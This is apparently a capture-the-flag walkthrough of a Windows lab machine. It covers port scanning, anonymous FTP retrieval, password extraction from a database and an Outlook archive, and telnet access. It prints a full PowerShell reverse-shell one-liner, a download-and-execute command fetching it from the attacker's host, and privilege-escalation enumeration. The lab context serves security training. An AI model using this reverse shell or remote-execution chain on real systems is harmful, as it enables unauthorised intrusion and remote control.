Machine IP: 10.10.10.98 - Windows- NMAP: All TCP ports
- NMAP: Open ports Service Version
- FTP Anonymous Login
- Telnet Anonymous Login
- Website
▶ nmap -Pn -sS -p- 10.10.10.98 -T4 --min-rate 5000 -oN nmap.surface
Nmap scan report for 10.10.10.98
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds▶ nmap -sC -sV -p 21,23,80 10.10.10.98 -T4 --min-rate 5000 -oN nmap.deep
Nmap scan report for 10.10.10.98
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.59 seconds- Telent log in failed.
▶ telnet 10.10.10.98
- Log in to ftp, anonymous login allowed.
▶ ftp 10.10.10.98
- Download all directories and files found in FTP.
▶ wget -m --no-passive ftp://anonymous:[email protected]
- Access File
▶ 7z x Access\ Control.zip
- Technical Information
▶ 7z l -slt Access\ Control.zip
- Look into the file
▶ strings backup.mdb
- Extract Information
▶ mdb-tables backup.mdb | grep --color=auto user
▶ mdb-export backup.mdb auth_user
▶ 7z x Access\ Control.zippassword: access4u@security
- Check the file.
▶ file Access\ Control.pstFile Type: Microsoft Outlook Personal Storage
- Convert
.pstfile to.mboxfile.
▶ readpst Access\ Control.pst
- Read emails
▶ less Access\ Control.mbox
Username: security
Password: 4Cc3ssC0ntr0ller- Login using found credentials.
▶ telnet 10.10.10.98
- Modify and upload
nishangTCP shell. /opt/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1.
The script should look like:
Nishang PowerShell One-Line Reverse TCP Shell
$client = New-Object System.Net.Sockets.TCPClient('<attacker_IP>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()▶ python -m http.server▶ nc -nlvvp 9001
C:\Users\security\Desktop>powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.24:8000/Invoke-PowerShellTcpOneLine.ps1')"
- Check if any stored credentials exist.
PS C:\Users\security\Desktop> cmdkey /list
The commands below are used to enumerate all the accessible shortcut (.lnk) files on the system, and examine them for the presence of the "runas" command.
C:\Users\security\Desktop> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txtC:\Users\security\Desktop> ForEach($file in gc .\shortcuts.txt) {Write-Output $file; gc $file | Select-String runas}
The results above show that the ZKAccess shortcut on the Public Desktop has been configured using the runas command.
The Desktop folder is not immediately visible since it is a hidden folder. It is possible to traverse the folder and list its contents. The folder is accessible to the builtin "NT AUTHORITY\INTERACTIVE" group. Users who log in "interactively" locally, or over a Remote Desktop or telnet session will have the Interactive SID in their access token.